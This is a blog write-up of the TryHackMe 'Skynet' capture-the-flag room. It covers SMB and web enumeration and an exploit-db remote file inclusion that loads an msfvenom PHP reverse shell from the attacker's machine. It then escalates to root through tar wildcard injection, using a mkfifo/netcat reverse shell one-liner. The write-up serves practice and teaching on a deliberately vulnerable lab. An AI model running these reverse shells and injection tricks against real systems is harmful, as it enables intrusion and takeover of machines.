Post

TryHackMe Skynet

Posted Updated
By Jason Kenyon
5 min read

Information Gathering

We are given:

Deploy and compromise the vulnerable machine!

Additonally, we are given the target IP 10.10.13.83. Our objectives are as follows:

  1. Obtain Miles’ email password,
  2. Identify the hidden directory,
  3. Recall the type of vulnerability wherein one includes a remote file for malicious purposes,
  4. Obtain the user flag, and
  5. Obtain the root flag.

Enumeration

We run an nmap scan with nmap -sS -T5 -sC -sV 10.10.13.83 and obtain the following

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

Nmap scan report for 10.10.13.83
Host is up (0.097s latency).
Not shown: 988 closed tcp ports (reset)
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp    open     http         Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Skynet
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp   open     pop3         Dovecot pop3d
|_pop3-capabilities: CAPA PIPELINING UIDL AUTH-RESP-CODE SASL RESP-CODES TOP
139/tcp   open     netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open     imap         Dovecot imapd
|_imap-capabilities: IMAP4rev1 more SASL-IR post-login have IDLE capabilities listed 
LITERAL+ Pre-login OK LOGINDISABLEDA0001 ENABLE ID LOGIN-REFERRALS
445/tcp   open     netbios-ssn  Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
646/tcp   filtered ldp
1023/tcp  filtered netvenuechat
1042/tcp  filtered afrog
3580/tcp  filtered nati-svrloc
3905/tcp  filtered mupdate
24444/tcp filtered unknown
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: 1h59m54s, deviation: 3h27m50s, median: -5s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-12-30T17:58:47
|_  start_date: N/A
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2024-12-30T11:58:47-06:00

Nmap done: 1 IP address (1 host up) scanned in 24.43 seconds

We notice SAMBA running on port 445/TCP and enumerate it using nmap --script samba-enum-shares.nse -p 445 10.10.13.83. This reveals

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.13.83\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (skynet server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.13.83\anonymous:
|     Type: STYPE_DISKTREE
|     Comment: Skynet Anonymous Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\srv\samba
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.13.83\milesdyson:
|     Type: STYPE_DISKTREE
|     Comment: Miles Dyson Personal Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\milesdyson\share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.13.83\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

We notice that we have read and write access on \\10.10.13.83\anonymous. Moreover, it appears that Miles’ personal files are accessible at \\10.10.13.83\milesdyson. However, this share is inaccessible without credentials.

On the anonymous share, we find a file attention.txt containing

1
2
3

A recent system malfunction has caused various passwords to be changed. All skynet
employees are required to change their password after seeing this.
-Miles Dyson

Additionally, we obtain some log files, which appear to be the history of the password resets mentioned in attention.txt.

Afterward, we move on to the web server at port 80/TCP and fuzz for directories using

1
2

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 
-u http://10.10.13.83/FUZZ -ic

This reveals the directory /squirrelmail, allowing us to login into Miles’ email account. The combination MilesDyson:<MOSTRECENTPASSFROMLOGS> works.

In Miles’ inbox, we find the following message

This password allows us to authenticate to Miles’ SMB share, where we find the file notes/important.txt. The file reads

1
2
3

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

This suggests that there is a directory named /45kra24zxs28v3yd. Navigating to http://10.10.13.83/45kra24zxs28v3yd/ reveals Miles’ personal page. The notes/important.txt file suggests that there is a login page available, so we fuzz using

1
2

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 
-u http://10.10.13.83/45kra24zxs28v3yd/FUZZ -ic

Consequently, we find a login form at /45kra24zxs28v3yd/administrator/.

Exploitation

After some research, we identify an exploit compatible with this CMS at https://www.exploit-db.com/exploits/25971.

To use this exploit, we first generate a php reverse shell with the command msfvenom -p php/reverse_php LHOST=10.6.4.176 -o shell.php. Then, we serve this file using python3 -m http.server and start a netcat listener with ncat -lvnp 4444. Finally, we visit the URL

1
2

http://10.10.13.83/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?
urlConfig=http://10.6.4.176:8000/shell.php

and receive a shell as www-data. We then obtain the user flag:

Post-Exploitation

Checking for cron jobs, we execute the command cat /etc/crontab, which returns

1
2
3
4
5
6
7
8
9
10
11
12

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/backup.sh
...

The first job seems atypical. At /home/milesdyson/backups/backups.sh, we find

1
2
3

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

We use wildcard injection to exploit this cron job: first, we cd /var/www/html. Then, we run echo "" > '--checkpoint=1 and

1

echo "" > '--checkpoint-action=exec=bash evil.sh'

Lastly, we write a reverse shell evil.sh using

1
2

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.6.4.176 1234 > /tmp/f" 
> evil.sh

After setting up a netcat listener with the command ncat -lvnp 1234, we receive a shell as root.

We then obtain the root flag:

CTFs
tryhackme
This post is licensed under CC BY 4.0 by the author.

Trending Tags

tryhackme